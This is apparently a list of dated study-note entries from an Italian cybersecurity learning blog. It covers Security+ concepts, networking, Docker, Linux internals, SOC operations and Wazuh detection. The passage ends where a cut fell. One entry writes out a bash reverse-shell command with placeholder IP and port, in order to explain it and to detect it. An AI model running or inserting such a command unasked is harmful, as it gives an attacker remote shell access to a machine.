Concetti on u-random

IDS e IPS - detection e prevention, host e rete

Wed, 27 May 2026 00:00:00 +0000

IDS rileva, IPS blocca. HIDS/HIPS agiscono sull'host, NIDS/NIPS sulla rete. La differenza inline/non-inline determina quando il blocco avviene.

Well-Known Ports - Security+

Mon, 18 May 2026 00:00:00 +0000

Porte da sapere a memoria per Security+ SY0-701. Organizzate per categoria: file transfer, remote access, email, web, directory, network services, database, VPN/IPSec.

Ruoli Aziendali - C-Suite e figure Security

Mon, 11 May 2026 00:00:00 +0000

Mappa delle figure dirigenziali e dei ruoli security in un'organizzazione. Utile per domande di governance e GRC sul Security+.

Bash Reverse Shell - Anatomia del comando

Sun, 10 May 2026 00:00:00 +0000

Analisi del comando bash -i >& /dev/tcp/IP/PORT 0>&1 - come funzionano i redirect di file descriptor e il pseudo-device /dev/tcp.

Kernel e Syscall - User Space vs Kernel Space

Sun, 10 May 2026 00:00:00 +0000

Il kernel è il nucleo del sistema operativo. Le syscall sono l'interfaccia tra programmi utente e kernel. Architetture diverse (ARM64, x86_64) hanno numeri di syscall diversi.

Operational Plans - DRP, IRP, BCP, Change Management

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra i piani operativi: Disaster Recovery Plan, Incident Response Plan, Business Continuity Plan e Change Management. Termini D4/D5 Security+ frequenti.

Risk Management - Termini chiave

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra risk register, risk tolerance, risk transfer e risk analysis. Termini D5 Security+ che escono spesso nelle domande.

Security Controls - Tipi e Funzioni

Sun, 10 May 2026 00:00:00 +0000

Classificazione dei controlli di sicurezza per tipo (Technical/Administrative/Physical) e per funzione (Preventive/Detective/Corrective/Compensating/Deterrent/Directive).

Frame, Pacchetto, Segmento - OSI e Stream

Thu, 07 May 2026 00:00:00 +0000

Differenza tra frame (L2), pacchetto IP (L3) e segmento TCP (L4). Matrioska OSI, NIC, stream indipendenti per livello. Base per leggere correttamente tshark e Wireshark.

Incident Response - Modiga cap 9 - Analisi e risposta agli incidenti

Wed, 06 May 2026 00:00:00 +0000

Gestione degli incidenti secondo Modiga cap 9: fasi IH, detection, analisi, prioritizzazione, SIEM tuning, containment. Nota in corso - p. 509.

SOC - Struttura e Organizzazione

Mon, 04 May 2026 00:00:00 +0000

Struttura operativa di un SOC: tier, ruoli specializzati, modelli di deployment (interno/esterno/ibrido), SLA, KPI, differenza SOC vs NOC.

iptables - Netfilter firewall Linux

Sun, 03 May 2026 00:00:00 +0000

Motore firewall del kernel Linux basato su Netfilter. Organizza le regole in chain (INPUT, OUTPUT, FORWARD). UFW è un frontend che traduce comandi semplici in regole iptables.

Wazuh + auditd: rilevare una reverse shell con regola custom

Sat, 02 May 2026 00:00:00 +0000

Come integrare auditd con Wazuh (Docker) per rilevare bash /dev/tcp: architettura agent/manager, permessi, formato log, regola XML custom.

DNS e HTTP in una LAN con switch

Fri, 01 May 2026 00:00:00 +0000

Come funziona la risoluzione DNS e la richiesta HTTP in una LAN flat con switch, senza router né gateway.

Routing statico e topologia LAN-internet

Fri, 01 May 2026 00:00:00 +0000

Come configurare il routing statico su router Cisco per connettere una LAN privata a una rete pubblica simulata, con DNS e HTTP server esterni.

DNS Tunneling

Wed, 29 Apr 2026 00:00:00 +0000

Tecnica C2 che usa il protocollo DNS per trasportare comandi e dati esfiltrati, bypassando i firewall perche' UDP 53 e' quasi sempre permesso.

RJ-45 e Cavi Ethernet - Pinout, Dritti e Incrociati

Wed, 29 Apr 2026 00:00:00 +0000

Il connettore RJ-45 ha 8 pin con ruoli TX/RX distinti. I cavi dritti collegano dispositivi diversi, i cavi incrociati collegano dispositivi uguali. Il segnale elettrico codifica i bit tramite variazioni di tensione.

Incident Response - Framework e Lifecycle

Tue, 28 Apr 2026 00:00:00 +0000

Definizione di IR, confronto framework (NIST, PICERL, MITRE ATT&CK, Time Based Security) e dettaglio operativo delle fasi PICERL con checklist.

IP Addressing & Subnetting

Tue, 28 Apr 2026 00:00:00 +0000

L'indirizzamento IP definisce l'identità di una macchina in rete (IP) e il confine del suo quartiere (Subnet Mask). RFC1918, broadcast, segmentazione Blue Team.

IP Subnetting - Matematica e Routing

Tue, 28 Apr 2026 00:00:00 +0000

Matematica del subnetting: formula host 2^n-2, calcolo binario, conversione CIDR/mask, /32, routing table e flusso pacchetto attraverso router.

MITRE ATT&CK Framework

Tue, 28 Apr 2026 00:00:00 +0000

Adversarial Tactics, Techniques, and Common Knowledge. Matrice globale per la tassonomia dei comportamenti avversari, con guida operativa all'uso in un SOC.

Command Injection

Sun, 26 Apr 2026 00:00:00 +0000

Vulnerabilità A03 OWASP: input utente viene passato a una shell di sistema senza sanitizzazione. Permette esecuzione arbitraria di comandi sul server.

Heredoc - blocco di testo come stdin

Sun, 26 Apr 2026 00:00:00 +0000

Sintassi bash per passare blocchi di testo multiriga come stdin a un comando. Usato con sudo tee per scrivere file di sistema.

Reverse Shell

Sun, 26 Apr 2026 00:00:00 +0000

Tecnica di accesso remoto dove la vittima si connette verso l'attaccante. Bypassa i firewall in ingresso. Rilevabile con auditd, Suricata o regole Wazuh custom.

file-descriptor

Thu, 23 Apr 2026 00:00:00 +0000

I tre canali standard aperti in ogni processo Unix: stdin (0), stdout (1), stderr (2). Fondamentali per capire pipe, redirezione e comportamento dei tool da terminale.

Architettura di Wazuh SIEM/XDR

Wed, 22 Apr 2026 00:00:00 +0000

Analisi dei componenti core di Wazuh: Agent, Manager, Indexer e Dashboard. Funzionamento del flusso di telemetria.

BGP e Autonomous Systems (AS) - Il GPS di Internet

Wed, 22 Apr 2026 00:00:00 +0000

Guida completa al routing globale: gerarchia delle reti, analogia delle Città-Stato, differenze tra IGP/eBGP/iBGP e analisi del BGP Hijacking.

EICAR Test File - Lo standard per il test malware

Wed, 22 Apr 2026 00:00:00 +0000

Una stringa standard di 68 caratteri utilizzata per testare il corretto funzionamento di antivirus, EDR e SIEM senza usare codice malevolo reale.

Indirizzi IP e Listening Ports - Guida SOC

Wed, 22 Apr 2026 00:00:00 +0000

Interpretazione degli indirizzi IP (0.0.0.0, 127.0.0.1, ::) e delle porte in ascolto durante l'investigazione SOC.

Rootkit - Il malware invisibile

Wed, 22 Apr 2026 00:00:00 +0000

Set di strumenti malevoli progettati per nascondere processi, file e connessioni di rete, spesso operando a livello di Kernel.

TCP Reliability e Modello OSI - La Guida Semplificata

Wed, 22 Apr 2026 00:00:00 +0000

Spiegazione del meccanismo di conferma (ACK) del TCP e mappatura semplificata degli strati OSI (Layer 2, 3, 4) per l'analisi dei log.

SOC Tiers - Ruoli e Responsabilità

Mon, 20 Apr 2026 00:00:00 +0000

Livelli gerarchici del SOC, attività operative Tier 1-3, impatto dell'AI (SOC 2.0) e vantaggi del background da Developer.

Docker Network

Sat, 18 Apr 2026 00:00:00 +0000

Docker crea reti virtuali isolate tra container. I container sulla stessa rete si vedono per nome (DNS interno). Quelli su reti diverse non si parlano - isolamento per design.

HTTP in Wireshark - TCP Segmentation e Packet Analysis

Fri, 17 Apr 2026 00:00:00 +0000

Come appare una sessione HTTP in Wireshark: TCP segmentation, MSS, Nagle's algorithm, gzip. Prospettiva packet analysis.

SMTP - Simple Mail Transfer Protocol

Fri, 17 Apr 2026 00:00:00 +0000

SMTP trasporta le email tra server. Architettura MUA/MTA, porte, flusso di consegna, email spoofing e meccanismi difensivi SPF/DKIM/DMARC.

DHCP - Dynamic Host Configuration Protocol

Thu, 16 Apr 2026 00:00:00 +0000

Protocollo che assegna automaticamente configurazione di rete ai dispositivi che si connettono - IP address, subnet mask, gateway, DNS. Senza DHCP ogni dispositivo dovrebbe essere configurato manualmente.

OWASP Top 10

Thu, 16 Apr 2026 00:00:00 +0000

Framework di classificazione delle 10 vulnerabilità web più critiche. Usato dai SOC analyst per categorizzare gli attacchi nei log e nei report.

Unicast, Broadcast, Multicast

Thu, 16 Apr 2026 00:00:00 +0000

I tre modi in cui un pacchetto può essere indirizzato in rete: a uno solo (unicast), a tutti (broadcast), a un gruppo (multicast).

Command Chaining e Grouping

Wed, 15 Apr 2026 00:00:00 +0000

Metodi per concatenare piu' comandi in un'unica riga di comando e gestire il flusso dell'output.

I Confini della Visibilità: Pubblico vs Privato

Wed, 15 Apr 2026 00:00:00 +0000

Analisi dei tre pilastri (Document Root, Permessi, Configurazione) che determinano cosa e' esposto sul web e come i container aggiungono un ulteriore strato di isolamento.

Path Traversal

Wed, 15 Apr 2026 00:00:00 +0000

Vulnerabilita' che permette a un attaccante di leggere file arbitrari sul server manipolando parametri che costruiscono percorsi di file.

Docker - UID, permessi e volumi bind mount

Mon, 13 Apr 2026 00:00:00 +0000

Il problema fondamentale dei bind mount Docker: l'UID dell'utente host e l'UID dell'utente container non coincidono, causando errori di permesso sui file montati. Soluzione: entrypoint dinamico che crea l'utente con il UID corretto a runtime.

Alternative a man (Cheatsheet)

Sun, 12 Apr 2026 00:00:00 +0000

Panoramica delle risorse alternative ai manuali ufficiali (man) per consultare rapidamente esempi pratici di comandi CLI.

IPv6 - Internet Protocol Version 6

Fri, 10 Apr 2026 00:00:00 +0000

Successore di IPv4 a 128 bit. Elimina la scarsità di indirizzi, rimuove il broadcast, introduce multicast nativo, header fisso a 40 byte. Adozione globale ~45-49% (2026). Richiede firewall esplicito - niente NAT implicito.

MTU - Maximum Transmission Unit

Fri, 10 Apr 2026 00:00:00 +0000

Maximum Transmission Unit - la dimensione massima in byte del payload di un frame su un link fisico. Opera a Layer 2. Determina se un pacchetto IP deve essere frammentato o se il mittente deve ridurre la dimensione dei dati.

NDP - Neighbor Discovery Protocol

Fri, 10 Apr 2026 00:00:00 +0000

Protocollo IPv6 che sostituisce ARP. Usa ICMPv6 e multicast invece di broadcast per trovare il MAC address di un host nella stessa LAN. Neighbor Solicitation (type 135) chiede, Neighbor Advertisement (type 136) risponde.

SQL Injection (SQLi)

Fri, 10 Apr 2026 00:00:00 +0000

Vulnerabilità web che permette di manipolare le query database tramite input non sanificati, bypassando i controlli di sicurezza.

IP Header e IPv4

Thu, 09 Apr 2026 00:00:00 +0000

Struttura dell'header IPv4: campi principali, TTL, frammentazione, checksum. IPv4 opera a Layer 3 e si occupa del routing tra reti diverse. Diverso da MAC che opera solo nella LAN.

Docker Volumes

Wed, 08 Apr 2026 00:00:00 +0000

Meccanismo di persistenza dei dati in Docker. I volumi sopravvivono al ciclo di vita dei container e possono essere condivisi tra piu container.

SSL/TLS

Tue, 07 Apr 2026 00:00:00 +0000

Protocollo che cifra le connessioni di rete. TLS handshake, catena CA, Perfect Forward Secrecy, post-quantum cryptography. Confronto con SSH.

TCP Handshake

Mon, 30 Mar 2026 00:00:00 +0000

Il TCP handshake e' la negoziazione obbligatoria che precede qualsiasi trasmissione dati via TCP. Tre pacchetti stabiliscono la connessione, uno la chiude. I flag nei pacchetti dicono tutto su cosa sta succedendo.

TCP vs UDP - Protocolli di Trasporto

Mon, 30 Mar 2026 00:00:00 +0000

TCP e UDP sono i due protocolli di trasporto al livello 4 dello stack OSI. TCP garantisce consegna ordinata con handshake e conferme. UDP e' senza connessione - veloce ma senza garanzie.

/var/run/docker.sock - il socket di Docker

Sat, 28 Mar 2026 00:00:00 +0000

docker.sock e' il Unix domain socket che permette al Docker CLI di comunicare con dockerd. Montarlo dentro un container equivale a dare al container il controllo completo di Docker - e quindi dell'host.

Git Objects - struttura interna di git

Sat, 28 Mar 2026 00:00:00 +0000

Git memorizza tutto come oggetti immutabili nel database .git/objects. Ogni commit, system, albero e tag e' un oggetto con un hash SHA-1. Capire questa struttura e' fondamentale per il secret scanning - i segreti sopravvivono nella storia anche dopo la rimozione.

POSIX - Portable Operating System Interface

Sat, 28 Mar 2026 00:00:00 +0000

POSIX (Portable Operating System Interface) e' uno standard IEEE che definisce il comportamento di shell, comandi e chiamate di sistema su Unix-like. Garantisce portabilita' degli script tra bash, zsh, sh e dash.

Secret Scanning - trovare segreti esposti

Sat, 28 Mar 2026 00:00:00 +0000

Il secret scanning e' la pratica di cercare credenziali, chiavi API e segreti esposti per errore in repository git, file di configurazione e log. E' uno dei vettori di compromissione piu' comuni e sottovalutati.

Shebang - #!

Sat, 28 Mar 2026 00:00:00 +0000

Lo shebang (#!) e' la sequenza nei primi due byte di uno script che dice al kernel quale interprete usare. Senza shebang lo script viene eseguito dalla shell corrente - comportamento non portabile.

Shell - confronto e differenze

Sat, 28 Mar 2026 00:00:00 +0000

Le shell Unix sono interpreti di comandi che implementano POSIX come contratto minimo comune. sh e dash sono minimali e veloci, bash aggiunge estensioni comode, zsh aggiunge ancora di piu', fish rompe la compatibilita' POSIX per una sintassi piu' pulita.

SSH Protocol - Secure Shell

Sat, 28 Mar 2026 00:00:00 +0000

Protocollo per connessioni remote cifrate. Sostituisce Telnet e rlogin. Handshake, TOFU, autenticazione con chiave, challenge-response, Perfect Forward Secrecy. Confronto con TLS.

Bash Startup Files - file di avvio

Thu, 26 Mar 2026 00:00:00 +0000

I file di startup di bash determinano quali variabili, alias e funzioni vengono caricati all'avvio della shell. L'ordine di lettura dipende dal tipo di sessione: login shell o non-login shell.

auth.log - log di autenticazione

Wed, 25 Mar 2026 00:00:00 +0000

auth.log e' il file di log delle autenticazioni su sistemi Debian/Ubuntu. Registra login SSH, sudo, su, adduser, userdel e ogni evento PAM. E' un file di testo alterabile da root - il journal e' piu' resistente alla manomissione.

journald - systemd-journald

Wed, 25 Mar 2026 00:00:00 +0000

systemd-journald e' il demone che raccoglie e indicizza tutti i log di sistema in un database binario strutturato. A differenza di auth.log, usa FSS per rendere le modifiche rilevabili. Si legge con journalctl.

PAM - Pluggable Authentication Modules

Wed, 25 Mar 2026 00:00:00 +0000

PAM (Pluggable Authentication Modules) e' il sistema di autenticazione modulare di Linux. Ogni servizio delega l'autenticazione a PAM che esegue una catena di moduli configurabili in /etc/pam.d/.

Linux Processes - processi

Tue, 24 Mar 2026 00:00:00 +0000

Un processo e' un programma in esecuzione con PID univoco, spazio di memoria isolato e stato. Il kernel crea l'illusione del multitasking switching rapidamente tra processi in coda CPU.

Shell Environment - ambiente shell

Tue, 24 Mar 2026 00:00:00 +0000

L'ambiente shell e' l'insieme di variabili d'ambiente ereditate dai processi figli. Distingue variabili locali (solo shell corrente) da variabili d'ambiente (esportate, visibili ai figli).

Etc Directory Purpose

Mon, 23 Mar 2026 00:00:00 +0000

La directory /etc/ contiene i file di configurazione globali del sistema operativo. Include i database critici per la gestione di utenti, gruppi e privilegi.

CIA Triad

Sun, 22 Mar 2026 00:00:00 +0000

La triade CIA definisce i tre obiettivi fondamentali della sicurezza informatica: Confidentiality, Integrity, Availability. Ogni attacco viola almeno uno di questi tre pilastri.

Cryptography

Sun, 22 Mar 2026 00:00:00 +0000

La crittografia protegge la Confidentiality e l'Integrity dei dati. Due approcci principali: simmetrica (una chiave, veloce) e asimmetrica (coppia pubblica/privata, lenta). I sistemi reali usano entrambe insieme.

Command Grouping - {}

Sat, 21 Mar 2026 00:00:00 +0000

Le graffe {} raggruppano piu' comandi in un unico stdout. La pipe che segue riceve tutto l'output come se fosse un comando solo. Fondamentale per mandare stream di dati a un processo senza aprire connessioni multiple.

Docker - Modello Mentale

Thu, 19 Mar 2026 00:00:00 +0000

Modello mentale per capire Docker prima di entrare nei dettagli tecnici. Ogni container e' un mini Linux isolato - un appartamento in un condominio.

Docker Compose

Thu, 19 Mar 2026 00:00:00 +0000

File YAML che descrive un'applicazione multi-container: quali immagini usare, come configurarle, come collegarle in rete, dove salvare i dati. Un solo file per gestire tutta l'infrastruttura.

Docker Image

Thu, 19 Mar 2026 00:00:00 +0000

Un'immagine Docker e' il template immutabile da cui nascono i container. Contiene il filesystem, le dipendenze e le istruzioni di avvio. Il container e' l'immagine in esecuzione.

Docker Security

Thu, 19 Mar 2026 00:00:00 +0000

I rischi di sicurezza specifici di Docker: docker.sock come vettore di privilege escalation, container root, porte esposte, immagini vulnerabili. Come difendersi da ciascuno.

Dockerfile

Thu, 19 Mar 2026 00:00:00 +0000

File di istruzioni per costruire un'immagine Docker. Ogni istruzione aggiunge un layer. ENTRYPOINT e CMD definiscono cosa esegue il container quando parte.

Reverse Proxy

Thu, 19 Mar 2026 00:00:00 +0000

Server intermediario che si posiziona davanti all'infrastruttura interna, accettando tutte le richieste esterne e distribuendole ai server giusti. Protegge il server, non il client.

Shell Interattiva vs Non Interattiva

Wed, 18 Mar 2026 00:00:00 +0000

La differenza tra shell interattiva e non interattiva determina quali file di configurazione vengono letti all'avvio. Fondamentale per capire persistence via dotfile e comportamento di SSH.

SUID, SGID e Sticky Bit

Wed, 18 Mar 2026 00:00:00 +0000

I tre bit speciali dei permessi Linux: SUID fa girare un processo con i permessi del proprietario del file, SGID con quelli del gruppo, Sticky Bit impedisce la cancellazione da parte di chi non è proprietario.

HTTP in Detail

Tue, 17 Mar 2026 00:00:00 +0000

Protocollo HTTP: struttura URL, metodi, status code, header, cookie e sessioni. Prospettiva applicativa.

ARP - Address Resolution Protocol